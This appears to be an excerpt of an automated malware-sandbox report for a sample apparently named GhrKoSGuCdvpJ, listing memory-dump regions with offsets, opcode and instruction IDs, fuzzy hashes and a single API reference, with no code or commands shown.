                                          • Instruction ID: 70c4d13c9f54ba6b469375846c3d7daaf158d227ebae9ac829cfa7f62d35b8aa
                                          • Opcode Fuzzy Hash: a82d94e2db01e1ffd670a6b4d34e39d908301040d64afb2f0183de8554840f50
                                          • Instruction Fuzzy Hash: 0652B974A10219CFCB54DF28ED98B9DBBB2FB89302F1081A9D40AA7354DB745E81CF95
                                          APIs
                                          • LdrInitializeThunk.NTDLL(00000000), ref: 07039CD6
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3746610010.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_7030000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 581447352e90f0d6badf9cb1ba22b719fb63b3fd50c5ac1b9b18ab0a5d8b7930
                                          • Instruction ID: 4396e3cbf18be2f72ecdea807c33a97c274154eacb8698b399eb1cfde261c693
                                          • Opcode Fuzzy Hash: 581447352e90f0d6badf9cb1ba22b719fb63b3fd50c5ac1b9b18ab0a5d8b7930
                                          • Instruction Fuzzy Hash: BE1172B4E202198FDB04DFA8D484AEDB7F9FB88318F548255E858E7241D774A941CF54
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (oq
                                          • API String ID: 0-1999159160
                                          • Opcode ID: 6ef121c3a8860005298a217fbf2353181bf90499d8bc6bc0d247c9abf79d9e31
                                          • Instruction ID: 951ec9bcdb3361982f4bfd587bbd03d1f4decd6908ac04a4f6d38f72d16b6738
                                          • Opcode Fuzzy Hash: 6ef121c3a8860005298a217fbf2353181bf90499d8bc6bc0d247c9abf79d9e31
                                          • Instruction Fuzzy Hash: C941F271B042049FDB15AB79D815BAE7BF6FFC8250F18806AE906D73A0CE709C42C7A4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (oq
                                          • API String ID: 0-1999159160
                                          • Opcode ID: c3e1480c120e6151174a63074322effc2fa12986e7df010e1e910d3b0f344d3d
                                          • Instruction ID: c8833591a83bce7e8b322f93300fa6d5f96c64e98a894b6f60ebcea7552e2141
                                          • Opcode Fuzzy Hash: c3e1480c120e6151174a63074322effc2fa12986e7df010e1e910d3b0f344d3d
                                          • Instruction Fuzzy Hash: C941D131A002099FEB15CF64D844BAA7BB6FF84310F04846AE8158B751D7B5ED86DBA0
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 80fe25beed8f13ee2c1660d14f9e64e650998af140f59a10f0dcbd08d782c355
                                          • Instruction ID: aeac6deef41fdd7b38e7969ebc9adba40cae7f9a2b06476c5af14bea49547778
                                          • Opcode Fuzzy Hash: 80fe25beed8f13ee2c1660d14f9e64e650998af140f59a10f0dcbd08d782c355
                                          • Instruction Fuzzy Hash: B522A4740313528FE7546F38AAAE56ABE69FB4F363744EC11FC4B85045DF700489AB2A
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2b9ea3c75e5cf18bb8abe3c1837b3e74a7565e3951a2d21af3ff4a30ac9b841f
                                          • Instruction ID: bda71bc139a9780f0abf5c5df2769a691d166a0772fbfb740a97eb12477d17f9
                                          • Opcode Fuzzy Hash: 2b9ea3c75e5cf18bb8abe3c1837b3e74a7565e3951a2d21af3ff4a30ac9b841f
                                          • Instruction Fuzzy Hash: C31294740313528FA7546F38AAAE52EBE69FB4F363344EC11FC4B85044DF700589AB2A
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 22dceb01b42ffaecc834c944b72ffcecef70a8ee5be351ec8332100ea150ba7b
                                          • Instruction ID: b3d6bc9726eaaa6bc5ae45bc109b96704d12656688d10acbc83faa155b04ab7f
                                          • Opcode Fuzzy Hash: 22dceb01b42ffaecc834c944b72ffcecef70a8ee5be351ec8332100ea150ba7b
                                          • Instruction Fuzzy Hash: A0F11C75A00614CFDB04CF69D888AADBBF6FF88350B158099E515AB371CB75EC82CB54
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b0f9ee4c16acc3308a151ad943c86344e012550f4cee6f1a750153e7ce29744a
                                          • Instruction ID: a7b207825d1b373df480346a28e91ed4de69ad77cd35d6782748509c8353e645
                                          • Opcode Fuzzy Hash: b0f9ee4c16acc3308a151ad943c86344e012550f4cee6f1a750153e7ce29744a
                                          • Instruction Fuzzy Hash: D57129747442058FEB15DF28C895EAA7BFABF49340B1540A9E916CB771DBB0DC82CB90
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 72e77f91f17715a84fcfc834915431916531b451f1be2e068219049186a78f3a
                                          • Instruction ID: 4b7e7ebf39cabbdacaddda5089fc387092b9ac3461bf4f13792b435b2ff25c3e
                                          • Opcode Fuzzy Hash: 72e77f91f17715a84fcfc834915431916531b451f1be2e068219049186a78f3a
                                          • Instruction Fuzzy Hash: F061E074D01318DBEB14DFA9D888BADBBB2FF89300F608529D805AB254DB759A85CF40
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 98936b7a8ad79b333e838a903a5b4e6426a56a3bb8ddda2523b66e18bfc4911c
                                          • Instruction ID: a8b0c0de18c275bcde8fc5be625489f40ef1db33ad27d2ac7df79b2786faf7be
                                          • Opcode Fuzzy Hash: 98936b7a8ad79b333e838a903a5b4e6426a56a3bb8ddda2523b66e18bfc4911c
                                          • Instruction Fuzzy Hash: DE519574E012189FDB54DFA9D984ADDBBF2FF89300F24916AE819AB365DB309941CF40
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 36444528777c1b6b44a3969a310e868a6e0a6488693d521e3e2e99003633750a
                                          • Instruction ID: 35195ad96bc1b1ff8fa53cba35b9b309793cd74aa1f49f1cecc5abe92de31d56
                                          • Opcode Fuzzy Hash: 36444528777c1b6b44a3969a310e868a6e0a6488693d521e3e2e99003633750a
                                          • Instruction Fuzzy Hash: E7517074E01208CFDB48DFA9E59499DBBF2FF89301B209169E805AB324DB35AC42CF54
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b170c2e361eb5dcd34d22197b37f298e828cfa11d6e62e834e918f9083cd84c5
                                          • Instruction ID: b6424dc6721a1a20aed88193d250cdf9f481ee6b4716f04adbe79b76eff6db4d
                                          • Opcode Fuzzy Hash: b170c2e361eb5dcd34d22197b37f298e828cfa11d6e62e834e918f9083cd84c5
                                          • Instruction Fuzzy Hash: 41417C31A04249DFEF11CFE8C844AEEBBB2FF45311F048156E905AB261D7B1E995DB90
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8b1a4c686d432051475bb339d69abf8f8186d530e55a8adee55711e0fb33ac25
                                          • Instruction ID: b26b1c61f51b97687501fc4a31928c14cb2a9ceaf4c2b08fb812393fb52ed2f3
                                          • Opcode Fuzzy Hash: 8b1a4c686d432051475bb339d69abf8f8186d530e55a8adee55711e0fb33ac25
                                          • Instruction Fuzzy Hash: D0315E3170420AAFDF019F69D844AAE7BB6FB58341F008029FA0987355CB75D9A2DBA5
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 15347b4ca5e33fcf44b94d97d73347e4ddcca3dc694d0e1e33702dab1511e2f5
                                          • Instruction ID: 3e1e8a5b3490cedc4af2721be719331401ca42db585f7840135faeb8a88b66cd
                                          • Opcode Fuzzy Hash: 15347b4ca5e33fcf44b94d97d73347e4ddcca3dc694d0e1e33702dab1511e2f5
                                          • Instruction Fuzzy Hash: 6A3129726093848FEB029F28D4207E53F72FF66210F4440DBD445CB392D675C99AC7A6
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4b8fede13b73924ced99bbf2f47464fcdf3f6375468ed213c81ef09b526bb8af
                                          • Instruction ID: 634a3b7b00a43d1a86190a25dcc855ef35ad9a7862e116e04b80e035591889a5
                                          • Opcode Fuzzy Hash: 4b8fede13b73924ced99bbf2f47464fcdf3f6375468ed213c81ef09b526bb8af
                                          • Instruction Fuzzy Hash: 862148353046104FEB251A398465ABD3A6FBFD5600B18803AD602CB7A5EEA6CC83E391
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f07a9bf991ce288b9155e426980fa1c67828445ca2e51c81a92ee4f4890335de
                                          • Instruction ID: 6a7d01983cbd394c5e9abc76f49b40a8faf701d826036bfc3fcd5c5c04a5582b
                                          • Opcode Fuzzy Hash: f07a9bf991ce288b9155e426980fa1c67828445ca2e51c81a92ee4f4890335de
                                          • Instruction Fuzzy Hash: 3C317C74D153098FDB44DFA8D8556EEBBF1FF4A300F10816AD905B7221EB740985CB96
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c2976d8949e57c0207d27fb57fb457f0004d74d4dbea8ef6afe32e0da6cdac39
                                          • Instruction ID: 1a4fb1307200aeeb82c979175fdcbc52653e62cfe3d5880b609d3c2de5375f0b
                                          • Opcode Fuzzy Hash: c2976d8949e57c0207d27fb57fb457f0004d74d4dbea8ef6afe32e0da6cdac39
                                          • Instruction Fuzzy Hash: 0221B0313046104BFB256629C4657BE3A9FBFC8645F188039D602CB798DEB6CC83E785
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 36ab1c329b54cac4bd84bef523c747d4a107f876e2bffe75c4d4a7c09317f7f3
                                          • Instruction ID: 7f57616b4ef6427c24cbb31b7d310fe2cba0204f1aa7b0e2f7c92f41254d731c
                                          • Opcode Fuzzy Hash: 36ab1c329b54cac4bd84bef523c747d4a107f876e2bffe75c4d4a7c09317f7f3
                                          • Instruction Fuzzy Hash: 79317071A006058FDB14CF68C889AAEBBB6FF84310B19C159E515AB3B5CF74ED42CB94
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e9e76b2059cd9df78cebd1e9fe3e7923fa2a3504fe0696665aadf71956cf78f5
                                          • Instruction ID: 9f73a8835fc04c85de782dc15b3460df2a45af07d8d3ca4a5ae3bed445bbccc8
                                          • Opcode Fuzzy Hash: e9e76b2059cd9df78cebd1e9fe3e7923fa2a3504fe0696665aadf71956cf78f5
                                          • Instruction Fuzzy Hash: 8921D335704A219FD7258B29D454A7E7BA2FF89751709817EE90ACB794CFB0CC42CB80
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cdbde7f29d2ad3d8db052c4beafedf670d7c1277f28636c968991afd1dd5691b
                                          • Instruction ID: 3e5165992aa225492ff380d1f2d4c2903ff2e7d8eb8bda2f9e2a45a95395add7
                                          • Opcode Fuzzy Hash: cdbde7f29d2ad3d8db052c4beafedf670d7c1277f28636c968991afd1dd5691b
                                          • Instruction Fuzzy Hash: 1221C135A002049FDB14EB68D450AEE7BB5FB9D360B50C129D91A9B350DB30EE86CBD1
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3733643976.00000000014FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FD000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_14fd000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ed091dbc031afc5b71a094494bed539922d2bf4eec6781c9ffea5d3716c9b735
                                          • Instruction ID: 90e0eaef0b34010ca93eefa72c83adac04d3b5e6edefb948e1a27d4bb9b5c34f
                                          • Opcode Fuzzy Hash: ed091dbc031afc5b71a094494bed539922d2bf4eec6781c9ffea5d3716c9b735
                                          • Instruction Fuzzy Hash: FC2128B1904240DFEB15DF94D9C4B27BB65FB88314F24C56EEA090B366C336D456CAA2
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3734544995.000000000161D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0161D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_161d000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fd08e172c8f99c7df9738089bf52b06e531720eb43dc013b6f4484bff78dfaa1
                                          • Instruction ID: 788f422b876f8e0501b0579513dd1e8f59cf9cfb77de1a534061de79e21cd7ed
                                          • Opcode Fuzzy Hash: fd08e172c8f99c7df9738089bf52b06e531720eb43dc013b6f4484bff78dfaa1
                                          • Instruction Fuzzy Hash: 972125B1504204DFDB15DF64CCC8B26BB61FB84314F28C56DE84A0B34AC736D847CA62
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2e7c255ea0806469e58eb969a7338de934e4383f22b3126a3718d83cd54a4390
                                          • Instruction ID: f14140fe6bb7d2da6c5686e3aa7eb948aa3a4515986257211c1309a5e9b17f6e
                                          • Opcode Fuzzy Hash: 2e7c255ea0806469e58eb969a7338de934e4383f22b3126a3718d83cd54a4390
                                          • Instruction Fuzzy Hash: 8021FD317042099FDB019F68D445AAB3BB2FB68301F00803AFA0A8B751CBB5CD95CBA1
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 88373399d905cae894b376f84788a72249533c327df2f22658667443fa4b2bed
                                          • Instruction ID: a794e17e0458b274820826a967775a4aa7b112fb3ef676206a79757c6a607353
                                          • Opcode Fuzzy Hash: 88373399d905cae894b376f84788a72249533c327df2f22658667443fa4b2bed
                                          • Instruction Fuzzy Hash: 7C318274E11308CFCB54DFA8E59899DBBB2FF49301B2080A9E809AB324DB35AD41CF50
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cdb970aff1eafad01915164b9be68fcb7db0f46fcf58da9628f4c5e16dc97710
                                          • Instruction ID: 165490550929ce76afd80c917d4efaf53a56361eaf089e44b63f941973127184
                                          • Opcode Fuzzy Hash: cdb970aff1eafad01915164b9be68fcb7db0f46fcf58da9628f4c5e16dc97710
                                          • Instruction Fuzzy Hash: E0217FB0E003099FEB01DFA9E84479EBBF2FB45300F44C1AAC1549B259EBB45A45DB91
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e66197161a43d03542b629d2bd6e033390608db4d92179beb890d4fe022b8b6f
                                          • Instruction ID: 64d02f75365439e527b7687f300fe1b2dbcab8107d854b23d4f0ed33060d422d
                                          • Opcode Fuzzy Hash: e66197161a43d03542b629d2bd6e033390608db4d92179beb890d4fe022b8b6f
                                          • Instruction Fuzzy Hash: 3A11E1353006219FD7259A2ED464A3ABBA6FF89651709457DEA0ACB360CFB0DC42CB94
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 01962617de8c79faa1af4ae3aa847d716b048441fd17e36570fdef28afe659bc
                                          • Instruction ID: 98f30b5ad0659e372cfd1f1a847a3a42581ddf4b3fb42010ae4672ccad73c885
                                          • Opcode Fuzzy Hash: 01962617de8c79faa1af4ae3aa847d716b048441fd17e36570fdef28afe659bc
                                          • Instruction Fuzzy Hash: 0121EFB4C152098FCB40DFA8D9555EEBFF1BB4A200F10816AE805B7220EB311A85CBA5
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3733643976.00000000014FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FD000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_14fd000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
                                          • Instruction ID: cab513be1ea8344c6adddf7c409413ee090f814906ce7a3a0c3e3c01d49a6811
                                          • Opcode Fuzzy Hash: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
                                          • Instruction Fuzzy Hash: 09119D76904280CFDB16CF54D5C4B16BF71FB88214F2485AAD9490A766C33AD456CBA2
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 687ecbf56e6b352ef2ee2e3aded3f263a2255dca6c002a438797b3ae65546916
                                          • Instruction ID: fd6bab245a3a2dec7179509109d458be65c60ec0907615d7653958863798bc21
                                          • Opcode Fuzzy Hash: 687ecbf56e6b352ef2ee2e3aded3f263a2255dca6c002a438797b3ae65546916
                                          • Instruction Fuzzy Hash: 39113AB0E002099FEB40DFA9E98479EBBF2FB45300F44C5AAC1599B254EBB45A45CF91
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3734544995.000000000161D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0161D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_161d000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
                                          • Instruction ID: abcdf83d38dec7cbdd0a89be95123ccb74278fb572b53155cf23673de8996491
                                          • Opcode Fuzzy Hash: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
                                          • Instruction Fuzzy Hash: CE11BE75504244CFDB12CF54C9C4B15BB71FB44314F28C6A9D8494B756C33AD44ACF51
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7299ee75171c7fcbfe388f4e4dadf37ba095a0a256b33a93a2949011146c98a3
                                          • Instruction ID: 86d30eae04237ac54a635c6e40289010b98b2da029a13fe1e848088cd4213dd5
                                          • Opcode Fuzzy Hash: 7299ee75171c7fcbfe388f4e4dadf37ba095a0a256b33a93a2949011146c98a3
                                          • Instruction Fuzzy Hash: 9001B532F001146BEB119E59D800BEF3BA7EBD8690F18802AFA09C7380DA718856D7A4
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b084ade81599154932c7029aa757e4e707ae4f87e08e0a881952e71e290aefe7
                                          • Instruction ID: 06eb2e92b0364fc2c790e4981fa173d613c3734e07cf3d04da102d8c41307f66
                                          • Opcode Fuzzy Hash: b084ade81599154932c7029aa757e4e707ae4f87e08e0a881952e71e290aefe7
                                          • Instruction Fuzzy Hash: B3113578E0020ADFDB40CFA8E8449EEBBB1FB89311F108166D915A3350D7785E66DF90
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f3583cecd492a92e038b7d7c189eb6f3005a0cd6bfba03a665f0705f943ecde2
                                          • Instruction ID: 3312eecd536ce0b1a13b892501165eb93b6986b0ccea58fe3ddf77fe0a899ac1
                                          • Opcode Fuzzy Hash: f3583cecd492a92e038b7d7c189eb6f3005a0cd6bfba03a665f0705f943ecde2
                                          • Instruction Fuzzy Hash: 42F01770A11225CF8B94EB78C904AAEB7F1AF09220B1145A9E509DB322EA70D9018BD1
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e463b411db07efaaa1e046d162974b9fbf19d84d94d64c7a8cb6d70e4de3ab9e
                                          • Instruction ID: dc639c5284246417d3045b5c52dd3034a489b7b8c233cdf6bb0d1f4a9aa56a10
                                          • Opcode Fuzzy Hash: e463b411db07efaaa1e046d162974b9fbf19d84d94d64c7a8cb6d70e4de3ab9e
                                          • Instruction Fuzzy Hash: 78E0C232D2032A978B10E6A9DC044EFBB38EE91220B904222D51033100EB30665DC2A0
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1b3d65f63fe94d8b23c3367685c75f6bd62a6a92b46d992b6ed04dc9f6153080
                                          • Instruction ID: 5173bff55ec8661dcf84086ce029f384702e65dc4f64c9eecc6a0c168bdb71ed
                                          • Opcode Fuzzy Hash: 1b3d65f63fe94d8b23c3367685c75f6bd62a6a92b46d992b6ed04dc9f6153080
                                          • Instruction Fuzzy Hash: 76D01231D2032A978B10A6A5DC044EEBB38EE95221B504626D51437144EB70665986A1
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ab4dd96f0deef28244affdf18636c73ddb15cb34a19ee10fac8678c753cca424
                                          • Instruction ID: 4bc824f88d690fe3fea1c5850ba4a393a9ac0c29ae3d4d13dfa11d1422b702bc
                                          • Opcode Fuzzy Hash: ab4dd96f0deef28244affdf18636c73ddb15cb34a19ee10fac8678c753cca424
                                          • Instruction Fuzzy Hash: CCD02B3051C3092FC605A775FC457063B7DA7E6181B84856EE0CE06159EDBC184286A5
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
